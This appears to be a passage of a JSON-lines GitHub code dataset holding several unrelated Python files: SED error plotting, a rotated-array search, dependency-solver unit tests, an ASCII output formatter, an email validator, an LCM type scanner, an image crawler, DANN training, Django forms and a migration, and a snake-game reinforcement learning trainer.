val_s_bandAbeta, val_s_bandEpeakalpha, val_s_bandEpeakbeta, val_s_bandalphabeta)\n\n SED_BAND_ERR = vE ** 2. * np.sqrt(vvfBAND_err2) * keVtoErg\n SED_BAND_high = SED_BAND + SED_BAND_ERR\n SED_BAND_low = SED_BAND - SED_BAND_ERR\n\n if component=='CPL':\n val_A=param_mean[ip]\n val_Epeak=param_mean[ip+1]\n val_index=param_mean[ip+2]\n val_Epiv=param_mean[ip+3]\n\n val_Epiv=100.\n #Epeak\n if base:\n Epeak_array[isim]=val_Epeak\n vfCPL = np.vectorize(fCPL)\n vvfCPL =vfCPL(vE,val_A,val_Epeak,val_index, val_Epiv )\n SED_CPL=vE**2*vvfCPL*keVtoErg\n SED_components.append(SED_CPL) #Add PL SED to SED components list\n SED_sum=SED_sum + SED_CPL\n #plot\n plt.loglog(vE[ie_low:ie_high],SED_CPL[ie_low:ie_high],component_linestyle, linewidth=component_linewidth,c=color10,alpha=0.8)\n\n val_s2A=covariance_matrix[ip,ip]\n val_s2Epeak=covariance_matrix[ip+1,ip+1]\n val_s2index=covariance_matrix[ip+2,ip+2]\n val_s2Epiv=covariance_matrix[ip+3,ip+3]\n val_s_AEpeak=covariance_matrix[ip,ip+1]\n val_s_Aindex=covariance_matrix[ip,ip+2]\n val_s_Epeakindex=covariance_matrix[ip+1,ip+2]\n vfCPL_err2 = np.vectorize(fCPL_err2)\n vvfCPL_err2,partialA_cpl, partialIndex_cpl, partialEpeak_cpl,partialEpiv_cpl = vfCPL_err2(vE, val_A, val_Epeak, val_index, val_Epiv, val_s2A, val_s2Epeak, val_s2index, val_s2Epiv, val_s_AEpeak, val_s_Aindex,\n val_s_Epeakindex)\n\n SED_CPL_ERR = vE ** 2. * np.sqrt(vvfCPL_err2) * keVtoErg\n SED_CPL_high = SED_CPL + SED_CPL_ERR\n SED_CPL_low = SED_CPL - SED_CPL_ERR\n\n if component=='BB':\n val_A=param_mean[ip]\n val_kT=param_mean[ip+1]\n vfBB = np.vectorize(fBB)\n vvfBB=vfBB(vE,val_A,val_kT)\n SED_BB=vE**2*vvfBB*keVtoErg\n SED_components.append(SED_BB) #Add PL SED to SED components list\n SED_sum=SED_sum + SED_BB\n # plot\n plt.loglog(vE[ie_low:ie_high],SED_BB[ie_low:ie_high],component_linestyle, linewidth=component_linewidth,c=color10,alpha=0.8)\n\n val_s2A=covariance_matrix[ip,ip]\n val_s2kT=covariance_matrix[ip+1,ip+1]\n val_s_AkT=covariance_matrix[ip,ip+1]\n vfBB_err2 = np.vectorize(fBB_err2)\n vvfBB_err2,partialA_bb, partialkT_bb = vfBB_err2(vE, val_A, val_kT, val_s2A, val_s2kT, val_s_AkT)\n\n SED_BB_ERR = vE ** 2 * np.sqrt(vvfBB_err2) * keVtoErg\n SED_BB_high = SED_BB + SED_BB_ERR\n SED_BB_low = SED_BB - SED_BB_ERR\n\n ip=ip+Nparameters[ic] \n\nerrs = 0.\nfor iparam1 in range (sum(Nparameters)):\n param1 = parnames[iparam1]\n for iparam2 in range(sum(Nparameters)):\n param2 = parnames[iparam2]\n sigmaparam = covariance_matrix[iparam1,iparam2]\n #print(param1, param2, sigmaparam)\n errs = errs+(eval('partial'+param1))*(eval('partial'+param2))*sigmaparam\n\ntotalerrs = vE**2*np.sqrt(errs)*keVtoErg\ntotalerrs_high = SED_sum+ totalerrs\ntotalerrs_low = SED_sum- totalerrs\n\n\n\nif OPT_SHADE:\n plt.fill_between(vE[ie_low:ie_high], totalerrs_high[ie_low:ie_high], totalerrs_low[ie_low:ie_high], color=color10, alpha=.25)\n plt.loglog(vE[ie_low:ie_high],totalerrs_high[ie_low:ie_high],model_linestyle, linewidth=model_linewidth,c=color10,alpha=0.3)\n plt.loglog(vE[ie_low:ie_high],totalerrs_low[ie_low:ie_high],model_linestyle, linewidth=model_linewidth,c=color10,alpha=0.3)\nelse:\n plt.loglog(vE[ie_low:ie_high],totalerrs_high[ie_low:ie_high],model_linestyle, linewidth=model_linewidth,c=color10,alpha=0.7)\n plt.loglog(vE[ie_low:ie_high],totalerrs_low[ie_low:ie_high],model_linestyle, linewidth=model_linewidth,c=color10,alpha=0.7)\n print('')\nplt.loglog(vE[ie_low:ie_high],SED_sum[ie_low:ie_high],model_linestyle, linewidth=totalmodel_linewidth,label=str_label,c=color10)\n\n\nplt.legend()","repo_name":"khadeejah-motiwala/SEDErrorCalculationTool","sub_path":"multiple_SEDs_loop.py","file_name":"multiple_SEDs_loop.py","file_ext":"py","file_size_in_byte":25002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"26044504222","text":"class Solution:\n def search(self, arr, target: int) -> int:\n '''\n 先遍历目标区间,再二分查找,存储目标再区间内的索引位置\n '''\n left, right = 0, 1\n record = []\n while right <= len(arr):\n if right < len(arr) - 1 and arr[right] >= arr[right - 1]:\n right += 1\n else:\n if target >= arr[left] and target <= arr[right-1]:\n if self.binary(arr, target, left, right-1):\n record.append(self.binary(arr, target, left, right-1))\n left = right\n right += 1\n return sorted(record, key=lambda x:x[0])[0][1] if record else -1\n\n def binary(self, arr, target, left, right):\n l, r = left, right\n while l < r:\n mid = int((l + r) / 2)\n if arr[mid] == target:\n r = mid\n elif arr[mid] < target:\n l = mid + 1\n else:\n r = mid - 1\n if arr[l] == target:\n return [l - left, l]\n else:\n return False","repo_name":"dc-huyf/algorithm","sub_path":"排序&二分/#面试题 10.03 搜索旋转数组.py","file_name":"#面试题 10.03 搜索旋转数组.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"41003408538","text":"import unittest\n\nfrom tracetools_analysis.processor import Dependant\nfrom tracetools_analysis.processor import DependencySolver\n\n\nclass DepEmtpy(Dependant):\n\n def __init__(self, **kwargs) -> None:\n self.myparam = kwargs.get('myparam', None)\n\n\nclass DepOne(Dependant):\n\n @staticmethod\n def dependencies():\n return [DepEmtpy]\n\n\nclass DepOne2(Dependant):\n\n @staticmethod\n def dependencies():\n return [DepEmtpy]\n\n\nclass DepTwo(Dependant):\n\n @staticmethod\n def dependencies():\n return [DepOne, DepOne2]\n\n\nclass TestDependencySolver(unittest.TestCase):\n\n def __init__(self, *args) -> None:\n super().__init__(\n *args,\n )\n\n def test_single_dep(self) -> None:\n depone_instance = DepOne()\n\n # DepEmtpy should be added before\n solution = DependencySolver(depone_instance).solve()\n self.assertEqual(len(solution), 2, 'solution length invalid')\n self.assertIsInstance(solution[0], DepEmtpy)\n self.assertIs(solution[1], depone_instance)\n\n def test_single_dep_existing(self) -> None:\n depempty_instance = DepEmtpy()\n depone_instance = DepOne()\n\n # Already in order\n solution = DependencySolver(depempty_instance, depone_instance).solve()\n self.assertEqual(len(solution), 2, 'solution length invalid')\n self.assertIs(solution[0], depempty_instance, 'wrong solution order')\n self.assertIs(solution[1], depone_instance, 'wrong solution order')\n\n # Out of order\n solution = DependencySolver(depone_instance, depempty_instance).solve()\n self.assertEqual(len(solution), 2, 'solution length invalid')\n self.assertIs(solution[0], depempty_instance, 'solution does not use existing instance')\n self.assertIs(solution[1], depone_instance, 'solution does not use existing instance')\n\n def test_duplicate_dependency(self) -> None:\n deptwo_instance = DepTwo()\n\n # DepOne and DepOne2 both depend on DepEmpty\n solution = DependencySolver(deptwo_instance).solve()\n self.assertEqual(len(solution), 4, 'solution length invalid')\n self.assertIsInstance(solution[0], DepEmtpy)\n self.assertIsInstance(solution[1], DepOne)\n self.assertIsInstance(solution[2], DepOne2)\n self.assertIs(solution[3], deptwo_instance)\n\n # Existing instance of DepEmpty, in order\n depempty_instance = DepEmtpy()\n solution = DependencySolver(depempty_instance, deptwo_instance).solve()\n self.assertEqual(len(solution), 4, 'solution length invalid')\n self.assertIsInstance(solution[0], DepEmtpy)\n self.assertIsInstance(solution[1], DepOne)\n self.assertIsInstance(solution[2], DepOne2)\n self.assertIs(solution[3], deptwo_instance)\n\n # Existing instance of DepEmpty, not in order\n solution = DependencySolver(deptwo_instance, depempty_instance).solve()\n self.assertEqual(len(solution), 4, 'solution length invalid')\n self.assertIsInstance(solution[0], DepEmtpy)\n self.assertIsInstance(solution[1], DepOne)\n self.assertIsInstance(solution[2], DepOne2)\n self.assertIs(solution[3], deptwo_instance)\n\n def test_kwargs(self) -> None:\n depone_instance = DepOne()\n\n # Pass parameter and check that the new instance has it\n solution = DependencySolver(depone_instance, myparam='myvalue').solve()\n self.assertEqual(len(solution), 2, 'solution length invalid')\n self.assertEqual(solution[0].myparam, 'myvalue', 'parameter not passed on') # type: ignore\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"azu-lab/ROS2-E2E-Evaluation","sub_path":"autoware_perf_galactic/tracetools_analysis-galactic_add_tp/tracetools_analysis/test/tracetools_analysis/test_dependency_solver.py","file_name":"test_dependency_solver.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"30871978054","text":"import os\nimport StringIO\nimport tarfile\n\nimport numpy\n\nfrom MDANSE import REGISTRY\nfrom MDANSE.Framework.Formats.IFormat import IFormat\n\nclass ASCIIFormat(IFormat):\n '''\n This class handles the writing of output variables in ASCII format. Each output variable is written into separate ASCII files which are further\n added to a single archive file. \n '''\n \n extension = \".dat\"\n\n extensions = ['.dat','.txt']\n \n @classmethod\n def write(cls, filename, data, header=\"\"):\n '''\n Write a set of output variables into a set of ASCII files.\n \n Each output variable will be output in a separate ASCII file. All the ASCII files will be compressed into a tar file.\n \n :param filename: the path to the output archive file that will contain the ASCII files written for each output variable.\n :type filename: str\n :param data: the data to be written out.\n :type data: dict of Framework.OutputVariables.IOutputVariable\n :param header: the header to add to the output file.\n :type header: str\n '''\n \n filename = os.path.splitext(filename)[0]\n filename = \"%s_ascii.tar\" % filename\n\n tf = tarfile.open(filename,'w')\n \n for var in data.values():\n tempStr = StringIO.StringIO()\n tempStr.write(var.info())\n tempStr.write('\\n\\n') \n cls.write_data(tempStr,var,data)\n tempStr.seek(0)\n\n info = tarfile.TarInfo(name='%s%s' % (var.varname,cls.extensions[0]))\n info.size=tempStr.len\n tf.addfile(tarinfo=info, fileobj=tempStr)\n \n if header:\n tempStr = StringIO.StringIO()\n tempStr.write(header)\n tempStr.write('\\n\\n') \n tempStr.seek(0)\n info = tarfile.TarInfo(name='jobinfo.txt')\n info.size=tempStr.len\n tf.addfile(tarinfo=info, fileobj=tempStr)\n \n tf.close()\n\n @classmethod\n def write_data(cls, fileobject, data, allData):\n '''\n Write an Framework.OutputVariables.IOutputVariable into a file-like object\n \n :param fileobject: the file object where the output variable should be written.\n :type fileobject: python file-like object\n :param data: the output variable to write (subclass of NumPy array).\n :type data: Framework.OutputVariables.IOutputVariable\n :param allData: the complete set of output variables\n :type allData: dict of Framework.OutputVariables.IOutputVariable\n \n :attention: this is a recursive method.\n '''\n \n if data.ndim > 2:\n fileobject.write(\"Can not write ASCII output for data of dimensionality > 2\")\n\n elif data.ndim == 2:\n xData,yData = data.axis.split(\"|\")\n\n if xData == \"index\":\n xValues = numpy.arange(data.shape[0])\n fileobject.write(\"# 1st column: %s (%s)\\n\"% (xData,\"au\"))\n else:\n xValues = allData[xData]\n fileobject.write(\"# 1st column: %s (%s)\\n\"% (allData[xData].varname,allData[xData].units))\n\n if yData == \"index\":\n yValues = numpy.arange(data.shape[1])\n fileobject.write(\"# 1st row: %s (%s)\\n\\n\"% (yData,\"au\"))\n else:\n yValues = allData[yData]\n fileobject.write(\"# 1st row: %s (%s)\\n\\n\"% (allData[yData].varname,allData[yData].units))\n\n zData = numpy.zeros((data.shape[0]+1,data.shape[1]+1),dtype=numpy.float)\n zData[1:,0] = xValues\n zData[0,1:] = yValues\n zData[1:,1:] = data\n\n numpy.savetxt(fileobject,zData)\n fileobject.write('\\n')\n\n else:\n xData = data.axis.split(\"|\")[0]\n\n if xData == \"index\":\n xValues = numpy.arange(data.size)\n fileobject.write(\"# 1st column: %s (%s)\\n\"% (xData,\"au\"))\n else:\n xValues = allData[xData]\n fileobject.write(\"# 1st column: %s (%s)\\n\"% (allData[xData].varname,allData[xData].units))\n\n fileobject.write(\"# 2nd column: %s (%s)\\n\\n\"% (data.varname,data.units))\n\n numpy.savetxt(fileobject,numpy.column_stack([xValues,data]))\n fileobject.write('\\n')\n\nREGISTRY['ascii'] = ASCIIFormat\n","repo_name":"RastislavTuranyi/MDANSE","sub_path":"Src/Framework/Formats/ASCIIFormat.py","file_name":"ASCIIFormat.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"7185782925","text":"\ndef func_verificadora(email):\n comp = email.split(\"@\") # Componentes\n if not len(comp) == 2: # Exactamente un \"@\"\n return False\n if not comp[0] or not comp[1]: # Antes y después de @ no vacíos\n return False\n dom = comp[1].split(\".\") # Sub dominios\n if not dom[-1] == \"cl\": # Solo dominios chilenos\n return False\n for d in dom:\n # Ningún sub dominio puede ser vacío.\n # Se asume que puntos sepran sub dominios.\n if not d:\n return False\n return True\n","repo_name":"IIC2233-2015-1/syllabus","sub_path":"Pautas Interrogaciones/I2/P5/P5_I2a.py","file_name":"P5_I2a.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"es","doc_type":"code","stars":7,"dataset":"github-code","pt":"79"} +{"seq_id":"10398250963","text":"#!/usr/bin/python\nimport re\nimport os\nimport sys\nimport pyclbr\nfrom io import open\n\ndef find_lcmtypes():\n alpha_chars = set(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\")\n valid_chars = set(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_\")\n lcmtypes = []\n regex = re.compile(\"_get_packed_fingerprint\")\n \n dirs_to_check = sys.path\n\n for dir_name in dirs_to_check:\n for root, dirs, files in os.walk(dir_name):\n subdirs = root[len(dir_name):].split(os.sep)\n subdirs = [ s for s in subdirs if s ]\n\n python_package = \".\".join(subdirs)\n\n for fname in files:\n if not fname.endswith(\".py\"):\n continue\n \n mod_basename = fname[:-3]\n valid_modname = True\n for c in mod_basename:\n if c not in valid_chars:\n valid_modname = False\n break\n if mod_basename[0] not in alpha_chars:\n valid_modname = False\n if not valid_modname:\n continue\n\n # quick regex test -- check if the file contains the \n # word \"_get_packed_fingerprint\"\n full_fname = os.path.join(root, fname)\n try: \n contents = open(full_fname, \"r\", encoding='latin1').read()\n # contents = open(full_fname, \"r\").read()\n except IOError:\n continue\n if not regex.search(contents):\n continue\n \n # More thorough check to see if the file corresponds to a\n # LCM type module genereated by lcm-gen. Parse the \n # file using pyclbr, and check if it contains a class\n # with the right name and methods\n if python_package:\n modname = \"%s.%s\" % (python_package, mod_basename)\n else:\n modname = mod_basename\n try:\n klass = pyclbr.readmodule(modname)[mod_basename]\n if \"decode\" in klass.methods and \\\n \"_get_packed_fingerprint\" in klass.methods:\n\n lcmtypes.append(modname)\n except ImportError:\n continue\n except KeyError:\n continue\n\n # only recurse into subdirectories that correspond to python \n # packages (i.e., they contain a file named \"__init__.py\")\n subdirs_to_traverse = [ subdir_name for subdir_name in dirs \\\n if os.path.exists(os.path.join(root, subdir_name, \"__init__.py\")) ]\n del dirs[:]\n dirs.extend(subdirs_to_traverse)\n return lcmtypes\n\ndef make_lcmtype_dictionary():\n \"\"\"Create a dictionary of LCM types keyed by fingerprint.\n\n Searches the specified python package directories for modules \n corresponding to LCM types, imports all the discovered types into the\n global namespace, and returns a dictionary mapping packed fingerprints\n to LCM type classes.\n\n The primary use for this dictionary is to automatically identify and \n decode an LCM message.\n\n \"\"\"\n lcmtypes = find_lcmtypes()\n\n result = {}\n\n for lcmtype_name in lcmtypes:\n try:\n __import__(lcmtype_name)\n mod = sys.modules[lcmtype_name]\n type_basename = lcmtype_name.split(\".\")[-1]\n klass = getattr(mod, type_basename)\n fingerprint = klass._get_packed_fingerprint()\n result[fingerprint] = klass\n #print \"importing %s\" % lcmtype_name\n except:\n print(\"Error importing %s\" % lcmtype_name)\n return result\n \nif __name__ == \"__main__\":\n import binascii\n print(\"Searching for LCM types...\")\n lcmtypes = make_lcmtype_dictionary()\n num_types = len(lcmtypes)\n print(\"Found %d type%s\" % (num_types, num_types==1 and \"\" or \"s\"))\n for fingerprint, klass in lcmtypes.items():\n print(binascii.hexlify(fingerprint), klass.__module__)\n","repo_name":"mit-biomimetics/Cheetah-Software","sub_path":"scripts/lcm-log2smat/python/lcmlog2smat/scan_for_lcmtypes.py","file_name":"scan_for_lcmtypes.py","file_ext":"py","file_size_in_byte":4163,"program_lang":"python","lang":"en","doc_type":"code","stars":2179,"dataset":"github-code","pt":"79"} +{"seq_id":"32501136297","text":"import socket\nimport re\nimport os\n\ndef RequeseG3t(url):\n s0cket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n pathArr = url.split(\"/\")\n \n portnumber = 80\n\n host = pathArr[2]\n\n\n try:\n s0cket.settimeout(20)\n s0cket.connect((host, portnumber))\n except socket.timeout as e:\n print(\"timed out o╥﹏╥o\")\n request = 'GET ' + url + ' HTTP/1.1\\r\\nHost: ' + pathArr[2] + '\\r\\nConnection: closed\\r\\n\\r\\n'\n print(request)\n\n s0cket.send(request.encode())\n\n Buffer = []\n while True:\n d = s0cket.recv(1024)\n \n Buffer.append(d)\n if len(d) <= 0:\n break\n\n data = b''.join(Buffer)\n s0cket.close()\n return data.split(b\"\\r\\n\\r\\n\")[1]\n\n\n\n\ndef gettheURL(url):\n \n \n rg = r'href = \"(.+?)\"'\n web = RequeseG3t(url).decode()\n hrefofRe = re.compile(rg)\n hreflist = re.findall(hrefofRe, web)\n \n urlGroup = []\n n = 0\n for hrefurl in hreflist:\n if hreflist[n][0:1] == \"/\":\n hrefurl = url + hreflist[n][1:]\n pathArr = url.split(\"/\")\n hostName = pathArr[2]\n hrefurl = \"http://\" + hostName + \"/\" + hreflist[n][1:] + \"/\"\n else:\n hrefurl = url + hreflist[n] + \"/\"\n \n\n n = n + 1\n urlGroup.append(hrefurl)\n\n print(\"catch %d new links\" % len(urlGroup))\n print(\"done\")\n return urlGroup\n\ndef picturecatch(url):\n\n web = RequeseG3t(url).decode()\n \n rg1 = r'src = \"(.+?\\.jpg)\"'\n pic1 = re.compile(rg1)\n piclist1 = re.findall(pic1, web)\n\n rg2 = r'src = \"(.+?\\.gif)\"'\n pic2 = re.compile(rg2)\n piclist2 = re.findall(pic2, web)\n\n rg3 = r'src = \"(.+?\\.jpeg)\"'\n pic3 = re.compile(rg3)\n piclist3 = re.findall(pic3, web)\n\n rg4 = r'src = \"(.+?\\.png)\"'\n pic4 = re.compile(rg4)\n piclist4 = re.findall(pic4, web)\n\n rg5 = r'src = \"(.+?\\.webp)\"'\n pic5 = re.compile(rg5)\n piclist5 = re.findall(pic5, web)\n\n piclist = piclist1 + piclist2 + piclist3 + piclist4 + piclist5\n print(piclist)\n\n for picurl in piclist:\n\n i1 = picurl.rfind('.', 0, len(picurl))\n i2 = picurl.rfind('/', 0, len(picurl))\n picFormat = picurl[i1:]\n picName = picurl[i2 + 1:i1]\n\n if picurl[0:1] == \"/\":\n pathArr = url.split(\"/\")\n hostName = pathArr[2]\n picpath = \"http://\" + hostName + picurl\n else:\n picpath = url + picurl\n\n\n if not os.path.exists(os.getcwd() + \"/\" + url[7:]):\n os.makedirs(os.getcwd() + \"/\" + url[7:])\n print(\"the folder is built \")\n else:\n print(\"the folder has existed.\")\n\n picData = RequeseG3t(picpath)\n\n fileName = os.getcwd() + \"/\" + url[7:] + picName + picFormat\n print(fileName)\n f = open(fileName, 'wb')\n f.write(picData)\n f.close()\n\n print(\"success ヾ(゚∀゚ゞ) !!!\")\n\nclass urlGroup:\n def __init__(self):\n self.urlGroup = []\n\n def append(self, obj):\n self.urlGroup.append(obj)\n\n def list(self):\n return self.urlGroup\n\n def print_list(self):\n print(self.urlGroup)\n\n def __len__(self):\n return len(self.urlGroup)\n\n def remove(self):\n self.urlGroup = list(set(self.urlGroup))\n\n\n\n\ndef depth(url, currentingDepth, maxedDepth):\n print(\"The current depth is: \", currentingDepth)\n if maxedDepth == currentingDepth:\n print(\"The url which is belong to current depth: \", url)\n else:\n urlGroup1.append(url)\n newurlGroup = gettheURL(url)\n for eachUrl in newurlGroup:\n urlGroup1.append(eachUrl)\n\n print(\"------\")\n for url in newurlGroup:\n depth(url, currentingDepth + 1, maxedDepth)\n\n\n\n\nurlGroup1 = urlGroup()\n\ndepth(\"http://csse.xjtlu.edu.cn/classes/CSE205/\", 0, 3)\n\nurlGroup1.remove()\nprint(urlGroup1.__len__())\nprint(urlGroup1.list())\nprint(os.getcwd())\nfor eachUrl in urlGroup1.list():\n picturecatch(eachUrl)\n\n","repo_name":"MinglangTuo/ImageCrawler","sub_path":"catchpictures.py","file_name":"catchpictures.py","file_ext":"py","file_size_in_byte":3969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"15345553612","text":"import os\nimport yaml\nimport argparse\nimport warnings\n\nfrom utils import load_model, visualize\nfrom core import source_only, dann, test\nfrom datasets import get_mnist, get_mnistm\nfrom models import Extractor, Classifier, Discriminator\n\n\nMODE_MAP = {'source-only': 'Source-Only', 'dann': 'DANN'}\nDATASETS_MAP = {'mnist': 'get_mnist', 'mnistm': 'get_mnistm'}\n\n\n# Ignore warnings\nwarnings.filterwarnings(action='ignore')\n\n\ndef get_args():\n \"\"\" Get the arguments for training and test \"\"\"\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--source', type=str, default='mnist', choices=DATASETS_MAP.keys(), help='Source datasets')\n parser.add_argument('--target', type=str, default='mnistm', choices=DATASETS_MAP.keys(), help='Target datasets')\n parser.add_argument('--mode', type=str, default='dann', choices=MODE_MAP.keys(), help='Training mode')\n parser.add_argument('--train', action='store_true', help='Train the models')\n parser.add_argument('--extractor', type=str, default=None, help='Extractor\\'s weights file')\n parser.add_argument('--classifier', type=str, default=None, help='Classifier\\'s weights file')\n\n args = parser.parse_args()\n return args\n\n\ndef main(args):\n \"\"\" The main function \"\"\"\n\n # Get the parameters\n config = yaml.load(open('config.yaml'))\n\n # Get the datasets\n train_source_loader = eval(DATASETS_MAP[args.source])(train=True)\n train_target_loader = eval(DATASETS_MAP[args.target])(train=True)\n test_source_loader = eval(DATASETS_MAP[args.source])(train=False)\n test_target_loader = eval(DATASETS_MAP[args.target])(train=False)\n\n # Get the models\n extractor = Extractor(**config['extractor'])\n classifier = Classifier(**config['classifier'])\n discriminator = Discriminator(**config['discriminator'])\n \n # Training\n if args.train:\n if args.mode == 'source-only':\n extractor, classifier = source_only(extractor, classifier, train_source_loader)\n else:\n extractor, classifier = dann(extractor, classifier, discriminator, train_source_loader, train_target_loader)\n\n # Load the models\n else:\n assert args.extractor != None, 'If train is False, you have to input the weights file.'\n assert args.classifier != None, 'If train is False, you have to input the weights file.'\n\n ext_filepath = os.path.join(config['save'], args.extractor)\n cls_filepath = os.path.join(config['save'], args.classifier)\n\n assert os.path.exists(ext_filepath), 'There is no {}'.format(ext_filepath)\n assert os.path.exists(cls_filepath), 'There is no {}'.format(cls_filepath)\n\n extractor = load_model(extractor, args.extractor)\n classifier = load_model(classifier, args.classifier)\n\n # Test\n print('\\nTest Result with Source Datasets on {}\\n'.format(MODE_MAP[args.mode]))\n test(extractor, classifier, test_source_loader)\n\n print('\\nTest Result with Target Datasets on {}\\n'.format(MODE_MAP[args.mode]))\n test(extractor, classifier, test_target_loader)\n\n # Visualization\n print('\\nVisualizing...\\n')\n visualize(extractor, test_source_loader, test_target_loader, MODE_MAP[args.mode] + '.png')\n\n print('Done!')\n \n\nif __name__ == '__main__':\n args = get_args()\n main(args)","repo_name":"enpko52/pytorch_DANN","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"79"} +{"seq_id":"74108075135","text":"from django.core.exceptions import ValidationError\nfrom django.forms import ModelForm\n\nfrom shoppingcart.models import Category, Item, Order\n\n\nclass OrderForm(ModelForm):\n def clean(self):\n cleaned_data = super(OrderForm, self).clean()\n delivery_option = cleaned_data.get(\"delivery_option\")\n distance_from_shop = cleaned_data.get(\"distance_from_shop\")\n shipping_address = cleaned_data.get(\"shipping_address\")\n\n if delivery_option == \"HMD\":\n if shipping_address != \"\" and distance_from_shop >= 0:\n pass\n elif not (distance_from_shop and shipping_address):\n raise ValidationError(\"Wrong delivery option\")\n\n class Meta:\n model = Order\n fields = [\n \"customer_name\",\n \"customer_mobile_no\",\n \"payment_method\",\n \"delivery_option\",\n \"distance_from_shop\",\n \"shipping_address\",\n ]\n\n\nclass ItemForm(ModelForm):\n class Meta:\n model = Item\n fields = [\n \"name\",\n \"category\",\n \"original_price\",\n \"discount_price\",\n \"weight_in_gms\",\n \"available\",\n ]\n\n\nclass CategoryForm(ModelForm):\n class Meta:\n model = Category\n fields = [\n \"name\",\n ]\n","repo_name":"chttrjeankr/shopping-cart","sub_path":"Hard/solution/shoppingcart/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"1761669713","text":"import snake\nimport agent\nimport numpy as np\n\n\ndef get_state(location_history, food_location):\n state = [([0] * 3) for i in range(49)]\n state[location_history[-1]][0] = 1 # location of head\n for location in location_history[0:-1]:\n state[location][1] = 1 # location of body\n state[food_location][2] = 1\n state = np.array(state).flatten()\n\n board = [0] * 49\n length = len(location_history)\n for n, i in enumerate(location_history):\n board[i] = ((length / 100) - 1) - ((n + 1) / 100)\n board[food_location] = 1\n return np.array([state]), np.array([board])\n\n\ndef get_event(location_history, food_location):\n possible_actions = 4\n events = []\n state, _ = get_state(location_history, food_location)\n game_e = snake.snake()\n for action in range(possible_actions):\n game_e.location_history = location_history[:]\n game_e.food_location = food_location\n game_e.snake_length = max(len(location_history), 3)\n result = game_e.play(action)\n reward = get_reward(result)\n if reward == -1:\n done = True\n events.append([None, action, reward, None, done])\n else:\n next_state, _ = get_state(game_e.location_history, game_e.food_location)\n done = False\n events.append([None, action, reward, next_state[:], done])\n\n events[0][0] = state\n return events\n\n\ndef get_reward(result):\n if 'move' in result:\n return 0\n if 'food' in result:\n return 1\n if 'invalid' in result:\n return -1\n\n\ndef test(model):\n game_test = snake.snake()\n end = False\n move = 0\n while not end:\n current_food = game_test.food_location\n state, _ = get_state(game_test.location_history, game_test.food_location)\n prediction = model.predict(state)[0]\n action = np.argmax(prediction)\n result = game_test.play(action)\n print(f' {int(prediction[0]*1000)}')\n print(f'{int(prediction[1]*1000)} {move} {int(prediction[3]*1000)}')\n print(f' {int(prediction[2]*1000)}')\n game_test.print_board()\n if current_food != game_test.food_location:\n move = 0\n else:\n move += 1\n if result == 'invalid' or move > 50:\n end = True\n\n\ndef train():\n ai = agent.Agent(147, 4, model_name=name)\n game_n = 0\n while True:\n game = snake.snake()\n end = False\n move = 0\n game_n += 1\n print(game_n, len(ai.memory), end='\\r')\n while not end:\n current_history = game.location_history[:]\n current_food = game.food_location\n state, board = get_state(current_history, current_food)\n action = ai.act(state, board)\n result = game.play(action)\n ai.memory.append(get_event(current_history, current_food))\n if current_food != game.food_location:\n move = 0\n else:\n move += 1\n if result == 'invalid' or move > 50:\n end = True\n if game_n % 3000 == 0:\n ai.exp_replay()\n test(ai.model)\n ai.model.save(f'model/{name}_{game_n}')\n\n\nname = 'd'\ntrain()\n","repo_name":"thinhpham2122/snake_ai","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"29304270432","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\ndef add_sessions(apps, schema_editor):\n Session = apps.get_model('hpc', 'Session')\n Session.objects.filter(name=\"البرنامج العام وبرنامج الأبحاث\").update(time_slot=None, code_name='main')\n Session.objects.filter(name=\"ورشة عمل: تجربة اختبار SMLE\").update(code_name='smle')\n Session.objects.create(name=\"محاضرة ECG\",\n time_slot=4,\n vma_id=0)\n Session.objects.create(name=\"محاضرة Antibiotics\",\n time_slot=4,\n vma_id=0)\n Session.objects.create(name=\"جلسة المجموعات العلاجية\",\n time_slot=None,\n code_name='therapy',\n vma_id=0,\n gender='F')\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('hpc', '0009_add_missing_fields'),\n ]\n\n operations = [\n migrations.RunPython(\n add_sessions),\n ]\n","repo_name":"enjaz/enjaz","sub_path":"hpc/migrations/0010_add_more_hpc_sessions.py","file_name":"0010_add_more_hpc_sessions.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"ar","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"} +{"seq_id":"35414702272","text":"\"\"\"\n这个文件不需要写类\n命令行接口\n创建Task\n\"\"\"\nfrom tasks import NextLocPred\nimport sys\nimport json\n\nif __name__ == \"__main__\":\n # shell 搬运的工作以及设计工作就交给其他人来做,这里只给出一个调用 task 的样例\n if len(sys.argv) != 4:\n print('wrong format parameters!', file=sys.stderr)\n exit(1)\n model_name = sys.argv[1] # deepMove / SimpleRNN / FPMC\n dataset_name = sys.argv[2]\n pre_name = sys.argv[3]\n config_file = open('./global_config.json', 'r')\n global_config = json.load(config_file)\n config_file.close()\n task = NextLocPred(config=global_config['task'])\n task.run(model_name=model_name, pre_name=pre_name, dataset_name=dataset_name, 